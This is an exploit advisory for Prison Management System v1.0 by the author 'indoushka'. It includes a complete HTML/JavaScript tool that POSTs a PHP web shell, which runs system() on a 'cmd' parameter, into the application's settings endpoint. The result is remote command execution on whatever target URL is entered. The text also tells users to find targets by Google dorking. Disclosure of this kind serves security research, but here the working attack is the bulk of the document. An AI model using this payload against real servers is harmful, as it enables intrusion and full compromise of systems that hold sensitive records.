=============================================================================================================================================
| # Title     : Prison Management System v1.0 php code injection Vulnerability                                                              |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/PHP-pms.zip                                           |
=============================================================================================================================================

poc :

[+] Dorking Ä°n Google Or Other Search Enggine.

[+] This HTML page is designed to create a file and inject PHP code.

[+] save payload as poc.html 

[+] In the line 13 , 'content[welcome]' name the file you want to create It will create a file with an HTML extension. 

   and in the same line, put the payload that suits you.

[+] Set your target url

[+] payload : 


<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title> PHP code injection Tool</title>
    <script>
        async function sendRequest() {
            const url = document.getElementById('url').value;
            const postData = {
                'content[welcome]': `<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>`
            };

            try {
                const response = await fetch(`${url}/classes/SystemSettings.php?f=update_settings`, {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/x-www-form-urlencoded'
                    },
                    body: new URLSearchParams(postData).toString()
                });

                if (response.ok) {
                    document.getElementById('result').innerText = '[+] Injection in welcome page\n[+] ' + url + '/?cmd=ls -al\n';

                } else {
                    document.getElementById('result').innerText = 'Error: ' + response.statusText;
                }
            } catch (error) {
                document.getElementById('result').innerText = 'Error making request: ' + error.message;
            }
        }
    </script>
</head>
<body>
    <h1>Injection Tool</h1>
    <form onsubmit="event.preventDefault(); sendRequest();">
        <label for="url">Enter URL:</label>
        <input type="text" id="url" name="url" required>
        <button type="submit">Submit</button>
    </form>
    <pre id="result"></pre>
</body>
</html>

Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================